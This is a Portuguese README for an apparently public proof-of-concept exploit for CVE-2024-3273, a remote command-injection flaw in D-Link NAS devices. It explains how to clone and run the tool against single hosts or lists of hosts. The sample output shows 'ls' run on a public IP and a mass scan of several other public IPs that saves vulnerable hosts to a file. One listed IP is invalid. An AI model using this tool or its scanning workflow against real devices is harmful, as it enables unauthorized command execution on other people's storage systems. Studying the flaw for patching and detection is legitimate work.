
Exploit para CVE-2024-3273, suporta hosts únicos e múltiplos
Este repositório contém uma Prova de Conceito (PoC) para CVE-2024-3273, uma vulnerabilidade de segurança descoberta em dispositivos D-Link NAS. A vulnerabilidade permite que atacantes executem comandos arbitrários em dispositivos vulneráveis.
CVE-2024-3273 é uma vulnerabilidade em dispositivos D-Link NAS que permite que atacantes remotos executem comandos arbitrários através de uma requisição HTTP maliciosa ao endpoint cgi-bin/nas_sharing.cgi.
Esta PoC demonstra como a vulnerabilidade pode ser explorada para executar comandos em dispositivos D-Link NAS vulneráveis.
requests bibliotecaClone este repositório:
git clone https://github.com/adhikara13/CVE-2024-3273.git
Navegue até o diretório do repositório:
cd CVE-2024-3273
Execute a PoC:
python main.py
Siga as instruções na tela para escolher o dispositivo alvo:
host:porta, e escolha se deseja exportar hosts vulneráveis para vulnerables.txt.┏┓┓┏┏┓ ┏┓┏┓┏┓┏┓ ┏┓┏┓━┓┏┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
┗┛┗┛┗┛ ┗━┗┛┗━┗╋ ┗┛┗━ ╹┗┛
Choose an option (1: Single Host, 2: Multiple Hosts): 1
Enter the host: 114.32.179.200
Enter the command to run: ls
Response from 114.32.179.200:
box.cgi
codepage_mgr.cgi
download_mgr.cgi
dropbox.cgi
folder_tree.cgi
┏┓┓┏┏┓ ┏┓┏┓┏┓┏┓ ┏┓┏┓━┓┏┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
┗┛┗┛┗┛ ┗━┗┛┗━┗╋ ┗┛┗━ ╹┗┛
Choose an option (1: Single Host, 2: Multiple Hosts): 2
Enter the file path containing hosts: list.txt
Export vulnerable host to vulnerables.txt? (y/n): y
Connection error for host 87.205.188.21:9290.
Connection error for host 186.212.112.141:8081.
Host 124.120.263.149:8032 is vulnerable.
Esta PoC é apenas para fins educacionais e de pesquisa. Use-a de forma responsável e apenas em dispositivos que você está autorizado a testar.
Contribuições são bem-vindas! Se encontrar algum problema ou melhoria, sinta-se à vontade para abrir uma issue ou criar um pull request.